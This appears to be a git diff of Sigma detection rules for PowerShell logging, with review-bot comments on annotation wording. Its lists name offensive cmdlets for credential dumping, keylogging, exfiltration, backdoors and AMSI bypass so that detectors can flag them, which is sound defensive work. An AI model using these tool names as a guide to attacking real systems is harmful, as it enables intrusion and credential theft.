diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml
index 9c08186d1..7503bb599 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml
@@ -3,7 +3,7 @@ id: e55a5195-4724-480e-a77e-3ebe64bd3759
 status: test
 description: Detects Obfuscated Powershell via use MSHTA in Scripts
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31)
 author: Nikita Nazarov, oscd.community
 date: 2020/10/08
 modified: 2022/11/29
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml
index 9ee18757a..197fb9a4c 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml
@@ -3,7 +3,7 @@ id: e54f5149-6ba3-49cf-b153-070d24679126
 status: test
 description: Detects Obfuscated Powershell via VAR++ LAUNCHER
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27)
 author: Timur Zinniatullin, oscd.community
 date: 2020/10/13
 modified: 2022/12/02
@@ -23,7 +23,7 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection_4104: - ScriptBlockText|re: (?i).*&&set.*(\{\d\}){2,}\\"\s+?-f.*&&.*cmd.*/c + ScriptBlockText|re: (?i).*&&set.*(\{\d\}){2,}\\"\s+?-f.*&&.*cmd.*/c # FPs with |\/r condition: ps_script and selection_4104 falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_keylogging.yml b/sigma/builtin/powershell/powershell_script/posh_ps_keylogging.yml index 459d1732b..8fda2616a 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_keylogging.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_keylogging.yml @@ -1,8 +1,7 @@ title: Powershell Keylogging id: 34f90d3c-c297-49e9-b26d-911b05a4866c status: test -description: Adversaries may log user keystrokes to intercept credentials as the user - types them. +description: Adversaries may log user keystrokes to intercept credentials as the user types them. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1 @@ -24,7 +23,7 @@ detection: - PowerShellCore/Operational selection_basic: ScriptBlockText|contains: Get-Keystrokes - selection_high: + selection_high: # want to run in background and keyboard ScriptBlockText|contains|all: - Get-ProcAddress user32.dll GetAsyncKeyState - Get-ProcAddress user32.dll GetForegroundWindow diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_localuser.yml b/sigma/builtin/powershell/powershell_script/posh_ps_localuser.yml index e0efa25f1..4f9c7dead 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_localuser.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_localuser.yml 
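Review bot: The trailing comment added to `selection_high:` in posh_ps_keylogging.yml, "want to run in background and keyboard", does not tell a reader what the selection is for; the two `Get-ProcAddress user32.dll` entries below it show the intent, so something like `selection_high: # API imports a keylogger needs: key-state polling and foreground-window lookup` would document it. The `# FPs with |\/r` comment appended to the regex in the posh_ps_invoke_obfuscation_via_var.yml hunk at the top of this line has the same problem: it presumably records that widening the final `/c` to also match `/r` caused false positives, but that should be spelled out (confirm the intent with the author) rather than left as a cryptic fragment next to a regex that is already hard to read. The selection_high list continues past the end of the hunk.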
@@ -1,12 +1,9 @@ title: Powershell LocalAccount Manipulation id: 4fdc44df-bfe9-4fcc-b041-68f5a2d3031c status: test -description: 'Adversaries may manipulate accounts to maintain access to victim systems. - - Account manipulation may consist of any action that preserves adversary access - to a compromised account, such as modifying credentials or permission groups - - ' +description: | + Adversaries may manipulate accounts to maintain access to victim systems. + Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_mailboxexport_share.yml b/sigma/builtin/powershell/powershell_script/posh_ps_mailboxexport_share.yml index 3a1c32972..0fba3c05f 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_mailboxexport_share.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_mailboxexport_share.yml @@ -1,11 +1,10 @@ title: Suspicious PowerShell Mailbox Export to Share - PS id: 4a241dea-235b-4a7e-8d76-50d817b146c4 related: - - id: 889719ef-dd62-43df-86c3-768fb08dc7c0 - type: derived + - id: 889719ef-dd62-43df-86c3-768fb08dc7c0 + type: derived status: test -description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports - a mailbox to a remote or local share, as used in ProxyShell exploitations +description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations references: - https://youtu.be/5mqid-7zp8k?t=2481 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html 
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_malicious_commandlets.yml b/sigma/builtin/powershell/powershell_script/posh_ps_malicious_commandlets.yml index 639e92639..ce53f0374 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_malicious_commandlets.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_malicious_commandlets.yml @@ -1,14 +1,14 @@ title: Malicious PowerShell Commandlets - ScriptBlock id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 related: - - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c - type: similar - - id: 02030f2f-6199-49ec-b258-ea71b07e03dc - type: similar - - id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf - type: obsoletes - - id: 83083ac6-1816-4e76-97d7-59af9a9ae46e - type: obsoletes + - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c + type: similar + - id: 02030f2f-6199-49ec-b258-ea71b07e03dc + type: similar + - id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf + type: obsoletes + - id: 83083ac6-1816-4e76-97d7-59af9a9ae46e + type: obsoletes status: test description: Detects Commandlet names from well-known PowerShell exploitation frameworks references: 
@@ -18,9 +18,9 @@ references: - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1 - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1 - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1 - - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ - - https://github.com/calebstewart/CVE-2021-1675 + - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec + - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec + - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1 - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html - https://github.com/HarmJ0y/DAMP @@ -30,9 +30,7 @@ references: - https://github.com/Kevin-Robertson/Powermad - https://github.com/adrecon/ADRecon - https://github.com/adrecon/AzureADRecon -author: Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine - Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, - Tobias Michalski, Austin Songer +author: Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer date: 2017/03/05 modified: 2023/11/22 tags: @@ -58,6 +56,7 @@ detection: - PowerShellCore/Operational selection: ScriptBlockText|contains: + # Note: Please ensure alphabetical order when adding new entries - Add-Exfiltration - Add-Persistence - Add-RegBackdoor 
@@ -144,7 +143,7 @@ detection: - Invoke-Farmer - Invoke-Get-RBCD-Threaded - Invoke-Gopher - - Invoke-Grouper + - Invoke-Grouper # Also Covers Invoke-GrouperX - Invoke-HandleKatz - Invoke-ImpersonatedProcess - Invoke-ImpersonateSystem @@ -168,7 +167,7 @@ detection: - Invoke-P0wnedshell - Invoke-Paranoia - Invoke-PortScan - - Invoke-PoshRatHttp + - Invoke-PoshRatHttp # Also Covers Invoke-PoshRatHttps - Invoke-PostExfil - Invoke-PowerDump - Invoke-PowerShellTCP @@ -187,7 +186,7 @@ detection: - Invoke-Seatbelt - Invoke-ServiceAbuse - Invoke-ShadowSpray - - Invoke-Sharp + - Invoke-Sharp # Covers all "Invoke-Sharp" variants - Invoke-Shellcode - Invoke-SMBScanner - Invoke-Snaffler @@ -229,15 +228,32 @@ detection: - Remove-Update - Rename-ADIDNSNode - Revoke-ADIDNSPermission - - Set-ADIDNSNode + - Set-ADIDNSNode # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner - Show-TargetScreen - Start-CaptureServer - Start-WebcamRecorder - VolumeShadowCopyTools + # - 'Check-VM' + # - 'Disable-MachineAccount' + # - 'Enable-MachineAccount' + # - 'Get-ApplicationHost' + # - 'Get-MachineAccountAttribute' + # - 'Get-MachineAccountCreator' + # - 'Get-Screenshot' + # - 'HTTP-Login' + # - 'Install-ServiceBinary' + # - 'Install-SSP' + # - 'New-DNSRecordArray' + # - 'New-MachineAccount' + # - 'Port-Scan' + # - 'Remove-MachineAccount' + # - 'Set-MacAttribute' + # - 'Set-MachineAccountAttribute' + # - 'Set-Wallpaper' filter_optional_amazon_ec2: ScriptBlockText|contains: - - Get-SystemDriveInfo - - C:\ProgramData\Amazon\EC2-Windows\Launch\Module\ + - Get-SystemDriveInfo # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1 + - C:\ProgramData\Amazon\EC2-Windows\Launch\Module\ # false positive form Amazon EC2 condition: ps_script and (selection and not 1 of filter_optional_*) falsepositives: - Unknown 
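Review bot: The block of commented-out cmdlet names added after `VolumeShadowCopyTools` (`# - 'Check-VM'` through `# - 'Set-Wallpaper'`) gives no reason for why each entry is disabled, so nobody can later tell whether it was dropped for false positives, for being covered by another rule, or just parked; the posh_ps_nishang_malicious_commandlets.yml hunks in this same commit show the better pattern, with a per-line `# Covered in <rule id>` or `# Prone to FPs`. The single `# - 'LSA_UNICODE_STRING'` added in posh_ps_malicious_keywords.yml has the same gap. Two small wording fixes on the filter comments as well: `# false positive form Amazon EC2` should be `# false positive from Amazon EC2`, and the bare URL on `Get-SystemDriveInfo` would be more useful as `# legitimate use in Windows maintenance diagnostics (CL_Utility.ps1), see URL`, keeping the link.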
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_malicious_keywords.yml b/sigma/builtin/powershell/powershell_script/posh_ps_malicious_keywords.yml index 12a755618..12bb297c8 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_malicious_keywords.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_malicious_keywords.yml @@ -24,6 +24,7 @@ detection: ScriptBlockText|contains: - AdjustTokenPrivileges - IMAGE_NT_OPTIONAL_HDR64_MAGIC + # - 'LSA_UNICODE_STRING' - Metasploit - Microsoft.Win32.UnsafeNativeMethods - Mimikatz @@ -43,7 +44,6 @@ detection: - TOKEN_QUERY condition: ps_script and selection falsepositives: - - Depending on the scripts, this rule might require some initial tuning to fit - the environment + - Depending on the scripts, this rule might require some initial tuning to fit the environment level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml b/sigma/builtin/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml index 08543a7f7..501784b90 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml @@ -1,8 +1,7 @@ title: Live Memory Dump Using Powershell id: cd185561-4760-45d6-a63e-a51325112cae status: test -description: Detects usage of a PowerShell command to dump the live memory of a Windows - machine +description: Detects usage of a PowerShell command to dump the live memory of a Windows machine references: - https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo author: Max Altgelt (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml b/sigma/builtin/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml index 4442833d6..eac6e1e76 100644 
--- a/sigma/builtin/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml @@ -1,11 +1,10 @@ title: Modify Group Policy Settings - ScriptBlockLogging id: b7216a7d-687e-4c8d-82b1-3080b2ad961f related: - - id: ada4b0c4-758b-46ac-9033-9004613a150d - type: similar + - id: ada4b0c4-758b-46ac-9033-9004613a150d + type: similar status: test -description: Detect malicious GPO modifications can be used to implement many other - malicious behaviors. +description: Detect malicious GPO modifications can be used to implement many other malicious behaviors. references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_msxml_com.yml b/sigma/builtin/powershell/powershell_script/posh_ps_msxml_com.yml index 87fe6ecd7..1a1e8fabc 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_msxml_com.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_msxml_com.yml 
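Review bot: The reflowed description in posh_ps_modify_group_policy_settings.yml is not a grammatical sentence ("Detect malicious GPO modifications can be used to implement..."); since the line is rewritten here, it should read `description: Detects malicious GPO modifications that can be used to implement many other malicious behaviors.` This keeps the meaning and matches the "Detects ..." phrasing the other rules in this commit use.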
@@ -1,15 +1,10 @@ title: Powershell MsXml COM Object id: 78aa1347-1517-4454-9982-b338d6df8343 status: test -description: 'Adversaries may abuse PowerShell commands and scripts for execution. - - PowerShell is a powerful interactive command-line interface and scripting environment - included in the Windows operating system. (Citation: TechNet PowerShell) - - Adversaries can use PowerShell to perform a number of actions, including discovery - of information and execution of code - - ' +description: | + Adversaries may abuse PowerShell commands and scripts for execution. + PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) + Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt - https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml b/sigma/builtin/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml index d11c70f4e..d9ce4f691 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml @@ -1,8 +1,7 @@ title: Malicious Nishang PowerShell Commandlets id: f772cee9-b7c2-4cb2-8f07-49870adc02e0 status: test -description: Detects Commandlet names and arguments from the Nishang exploitation - framework +description: Detects Commandlet names and arguments from the Nishang exploitation framework references: - https://github.com/samratashok/nishang author: Alec Costello 
@@ -24,6 +23,9 @@ detection: selection: ScriptBlockText|contains: - Add-ConstrainedDelegationBackdoor + # - 'Add-Persistence' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 + # - 'Add-RegBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 + # - 'Add-ScrnSaveBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - Copy-VSS - Create-MultipleSessions - DataToEncode @@ -46,12 +48,15 @@ detection: - FakeDC - FireBuster - FireListener - - 'Get-Information ' + - 'Get-Information ' # Space at the end is required. Otherwise, we get FP with Get-InformationBarrierReportDetails or Get-InformationBarrierReportSummary + # - 'Get-PassHashes' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - Get-PassHints - Get-Web-Credentials - Get-WebCredentials - Get-WLAN-Keys + # - 'Gupt-Backdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - HTTP-Backdoor + # - 'Invoke-ADSBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - Invoke-AmsiBypass - Invoke-BruteForce - Invoke-CredentialsPhish @@ -62,16 +67,21 @@ detection: - Invoke-JSRatRundll - Invoke-MimikatzWDigestDowngrade - Invoke-NetworkRelay + # - 'Invoke-PortScan' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 + # - 'Invoke-PoshRatHttp' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - Invoke-PowerShellIcmp - Invoke-PowerShellUdp - Invoke-Prasadhak - Invoke-PSGcat - Invoke-PsGcatAgent + # - 'Invoke-PsUACme' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - Invoke-SessionGopher - Invoke-SSIDExfil + # - Jitter # Prone to FPs + # - 'Keylogger' # Too generic to be linked to Nishang - LoggedKeys - Nishang - - NotAllNameSpaces + - NotAllNameSpaces # This is param to "Set-RemoteWMI" - Out-CHM - OUT-DNSTXT - Out-HTA diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_ntfs_ads_access.yml b/sigma/builtin/powershell/powershell_script/posh_ps_ntfs_ads_access.yml index 7b0e21573..a1b7e0ac6 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_ntfs_ads_access.yml 
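Review bot: The comment added to `'Get-Information '` explains why the trailing space is needed but not its cost: with the space, `Get-Information` immediately followed by a newline, `|`, `;` or `)` no longer matches, and that trade-off should be recorded for future tuners, e.g. `# Trailing space avoids FPs with Get-InformationBarrierReport*; it also misses Get-Information at end of line or before |/;/)`. Separately, the `# Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6` annotations on the commented-out entries here (and on `Out-Minidump` in posh_ps_shellintel_malicious_commandlets.yml, hunk `@@ -24,6 +24,7 @@`) are the kind of cross-reference Sigma expresses in `related:`; unless that rule is already listed there outside this hunk, add `- id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6` / `type: similar` so tooling sees the link rather than only a comment. The cmdlet list continues past the end of the hunk.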
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_ntfs_ads_access.yml @@ -1,8 +1,7 @@ title: NTFS Alternate Data Stream id: 8c521530-5169-495d-a199-0a3a881ad24e status: test -description: Detects writing data into NTFS alternate data streams from powershell. - Needs Script Block Logging. +description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging. references: - http://www.powertheshell.com/ntfsstreams/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml b/sigma/builtin/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml index 36f9e6472..62fe0e37b 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml @@ -1,12 +1,9 @@ title: Code Executed Via Office Add-in XLL File id: 36fbec91-fa1b-4d5d-8df1-8d8edcb632ad status: test -description: 'Adversaries may abuse Microsoft Office add-ins to obtain persistence - on a compromised system. - +description: | + Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml b/sigma/builtin/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml index fba57043e..ad158af32 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml 
@@ -1,8 +1,7 @@ title: Potential Invoke-Mimikatz PowerShell Script id: 189e3b02-82b2-4b90-9662-411eb64486d4 status: test -description: Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential - dumper capable of obtaining plaintext Windows account logins and passwords. +description: Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords. references: - https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script author: Tim Rauch diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml b/sigma/builtin/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml index 75451bddb..da370ae2f 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml @@ -1,8 +1,8 @@ title: PowerView PowerShell Cmdlets - ScriptBlock id: dcd74b95-3f36-4ed9-9598-0490951643aa related: - - id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d - type: similar + - id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d + type: similar status: test description: Detects Cmdlet names from PowerView of the PowerSploit exploitation framework. references: @@ -39,7 +39,7 @@ detection: - Find-ForeignUser - Find-GPOComputerAdmin - Find-GPOLocation - - Find-InterestingDomain + - Find-InterestingDomain # Covers: Find-InterestingDomainAcl, Find-InterestingDomainShareFile - Find-InterestingFile - Find-LocalAdminAccess - Find-ManagedSecurityGroups @@ -55,7 +55,7 @@ detection: - Get-LastLoggedOn - Get-LoggedOnLocal - Get-NetFileServer - - Get-NetForest + - Get-NetForest # Covers: Get-NetForestCatalog, Get-NetForestDomain, Get-NetForestTrust - Get-NetGPOGroup - Get-NetProcess - Get-NetRDPSession 
@@ -80,6 +80,58 @@ detection: - Remove-RemoteConnection - Request-SPNTicket - Resolve-IPAddress + # - 'Get-ADObject' # prone to FPs + # - 'Get-Domain' # too many FPs # Covers Cmdlets like: DomainComputer, DomainController, DomainDFSShare, DomainDNSRecord, DomainGPO, etc. + # - 'Add-DomainGroupMember' + # - 'Add-DomainObjectAcl' + # - 'Add-ObjectAcl' + # - 'Add-RemoteConnection' + # - 'Convert-ADName' + # - 'Convert-NameToSid' + # - 'ConvertFrom-UACValue' + # - 'ConvertTo-SID' + # - 'Get-DNSRecord' + # - 'Get-DNSZone' + # - 'Get-DomainComputer' + # - 'Get-DomainController' + # - 'Get-DomainGroup' + # - 'Get-DomainGroupMember' + # - 'Get-DomainManagedSecurityGroup' + # - 'Get-DomainObject' + # - 'Get-DomainObjectAcl' + # - 'Get-DomainOU' + # - 'Get-DomainPolicy' + # - 'Get-DomainSID' + # - 'Get-DomainSite' + # - 'Get-DomainSPNTicket' + # - 'Get-DomainSubnet' + # - 'Get-DomainUser' + # - 'Get-DomainUserEvent' + # - 'Get-Forest' # Covers: Get-ForestDomain, Get-ForestGlobalCatalog, Get-ForestTrust + # - 'Get-IPAddress' + # - 'Get-NetComputer' # Covers: Get-NetComputerSiteName + # - 'Get-NetDomain' # Covers: Get-NetDomainController, Get-NetDomainTrust + # - 'Get-NetGroup' # Covers: Get-NetGroupMember + # - 'Get-NetLocalGroup' # Covers: NetLocalGroupMember + # - 'Get-NetLoggedon' + # - 'Get-NetOU' + # - 'Get-NetSession' + # - 'Get-NetShare' + # - 'Get-NetSite' + # - 'Get-NetSubnet' + # - 'Get-NetUser' + # - 'Get-ObjectAcl' + # - 'Get-PathAcl' + # - 'Get-Proxy' + # - 'Get-SiteName' + # - 'Get-UserEvent' + # - 'Get-WMIProcess' + # - 'New-DomainGroup' + # - 'New-DomainUser' + # - 'Set-ADObject' + # - 'Set-DomainObject' + # - 'Set-DomainUserPassword' + # - 'Test-AdminAccess' condition: ps_script and selection falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_psasyncshell.yml b/sigma/builtin/powershell/powershell_script/posh_ps_psasyncshell.yml index 11df4c42f..195a7909e 100644 
--- a/sigma/builtin/powershell/powershell_script/posh_ps_psasyncshell.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_psasyncshell.yml @@ -1,8 +1,7 @@ title: PSAsyncShell - Asynchronous TCP Reverse Shell id: afd3df04-948d-46f6-ae44-25966c44b97f status: test -description: Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written - in powershell +description: Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell references: - https://github.com/JoelGMSec/PSAsyncShell author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_remote_session_creation.yml b/sigma/builtin/powershell/powershell_script/posh_ps_remote_session_creation.yml index 493f0dc98..b97dd5ea9 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_remote_session_creation.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_remote_session_creation.yml @@ -1,12 +1,9 @@ title: PowerShell Remote Session Creation id: a0edd39f-a0c6-4c17-8141-261f958e8d8f status: test -description: 'Adversaries may abuse PowerShell commands and scripts for execution. - - PowerShell is a powerful interactive command-line interface and scripting environment - included in the Windows operating system - - ' +description: | + Adversaries may abuse PowerShell commands and scripts for execution. + PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2 
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml b/sigma/builtin/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml index 19d00252a..b32f7931f 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml @@ -1,17 +1,14 @@ title: Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 related: - - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 - type: similar - - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 - type: similar - - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 - type: similar + - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation + type: similar + - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic + type: similar + - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module + type: similar status: experimental -description: Detects PowerShell module creation where the module Contents are set - to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential - abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable - to module load-order hijacking. +description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml b/sigma/builtin/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml index 844076689..4ec8fce64 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml @@ -1,14 +1,10 @@ title: Request A Single Ticket via PowerShell id: a861d835-af37-4930-bcd6-5b178bfb54df status: test -description: 'utilize native PowerShell Identity modules to query the domain to extract - the Service Principal Names for a single computer. - +description: | + utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. - A successful execution will output the SPNs for the endpoint in question. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml 